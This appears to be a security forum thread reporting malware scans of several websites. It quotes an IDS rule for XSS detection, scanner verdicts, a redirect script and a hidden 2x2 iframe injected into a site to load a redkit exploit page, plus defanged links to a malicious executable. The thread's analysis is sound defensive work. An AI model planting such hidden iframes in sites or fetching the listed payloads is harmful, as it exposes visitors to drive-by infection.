htxp://jsunpack.jeek.org/?report=5c1d23502095b37213748d668ffd099c5248c7d2
Detected as a cross site scripting attack: === Triggered rule ===
alert(url_content:“%3CSCRIPT”; nocase; msg:“ tags GET request cross site scripting attempt”; url_re:“/%3Cscript.*%3E/i”; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
polonus
Another one: unsure verdict, some IDS alerts, given as with unknown_html_google_malware; IDS (twice): http_inspect: JAVASCRIPT WHITESPACES EXCEEDS MAX ALLOWED (severity 3) see: http://www.snort.org/search/sid/120-10 → Http Inspect will also detect consecutive whitespace and normalize it to a single space. The config option “max_javascript_whitespaces” determines the maximum number of consecutive whitespaces allowed within the Javascript.
; blacklisted - yes: http://quttera.com/detailed_report/www.51-help.com → http://www.yandex.com/infected?url=51-help.com&l10n=en
Security warning according to Sucuri’s: http://sitecheck.sucuri.net/results/www.51-help.com/ /service/index.htm & service/main.htm & solution//index.hrm
hidden iFrames: http://sucuri.net/malware/entry/MW:IFRAME:HD202
See also: http://scanurl.net/?u=http%3A%2F%2Fwww.51-help.com%2F&uesb=Check+This+URL#results
Verdict: Main URL: http://www.51-help.com is suspicious → http://evuln.com/tools/malware-scanner/www.51-help.com/
polonus
Here is demonstrated how soon the threat landscape can change…
See recent scan, clean: http://urlquery.net/report.php?id=3241197 → http://evuln.com/tools/malware-scanner/canadianhomeleisure.com/
and http://siteinspector.comodo.com/public/reports/15081761
Previous situation with IDS alerts: redkit * malicious iFrame: http://urlquery.net/report.php?id=2572066
Potentially suspicious is /misc/jquery.js?.1.8.8 with Shell upload vulnerabilities
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method eval __tmpvar1755052859 = eval;
packed to save bandwith…
Foud by Quttera’s here: http://quttera.com/detailed_report/canadianhomeleisure.com
a WordpRees theme hack? http://wordpress.org/support/topic/theme-hacked - posted by iamgiant
The malicious javascript detected and identified with redkit iframe=
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2
width=2 src=htxp://decktech.org/chhs.html?j=1286003> 301 Moved Permanently and a 404 Not Found now
</iframe>
src url is blocked by Bitdefender TrafficLight, but given clean here: http://sitecheck.sucuri.net/results/www.decktech.org
On IP now found
|_http-title: Coming Soon page
Running on Apache httpd 2.2 Google Analytics installed: UA-2898485-20
pol
Here we find redirecting to a relative URL in JavaScript: http://urlquery.net/report.php?id=3241686
Tp see this we explore with jsunpack →
<html><body><script>document.cookie='yyyyyyy=2cab1371yyyyyyy_2cab1371; path=/';window.location.href=window.location.href;</script></body></html>
here document.location.href = ‘/path’; //relative to domain
is being used.
These is the IDS alert we meet for the URL: http://doc.emergingthreats.net/bin/view/Main/2012593 and http://rules.emergingthreats.net/changelogs/snort-2.4.0.etpro.2011-05-19T22:12:29.txt (source=oinkmaster)
Here we read on the abuse of these Non-chargeable domains by cybercriminals: http://www.spamfighter.com/News-17018-Cyber-criminals-choosing-Non-chargeable-“cems”-Domains-Reports-Zscaler.htm (on spamfighter news)
polonus
See: Up(nil): unknown_exe ARIN US engineering at gnax dot net 64.22.111.82 to 64.22.111.82 jamondetrujillo dot com htxp://www.jamondetrujillo.com/toolbariber34/lentils.exe
https://www.virustotal.com/nl/url/a0c6128b08a676ea2906778fa8b4787ba7e6996b67ef65e0b6bfb475a6baba1f/analysis/ 3 detection
url detected by Bitdefender’s TrafficLight and flagged by WOT → http://urlquery.net/report.php?id=3276569
Seems an overdue! PHISH page…http://www.mywot.com/en/scorecard/64.22.111.82?utm_source=addon&utm_content=popup-donuts
Why? See: http://sameid.net/ip/64.22.111.82/ & http://www.projecthoneypot.org/ip_64.22.111.82
Page has no title and page has no description Text may be too short Spiders see 21 words MZ L This program cannot be run in DOS mode. Yq q q q t p p p Richq PEL D
One potential suspicious here: /plugins/system/rokbox/rokbox.js
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method write __tmpvar446851846 = write;
Threat dump: see: http://jsunpack.jeek.org/?report=e706f5a7e310c8a19e051f958ce70177ebf1ab02 (open with active script blocker and in a VM)
File size[byte]: 20276
File type: ASCII
MD5: A9D7CD66A9C1C6A5995CC9BE2D689331
polonus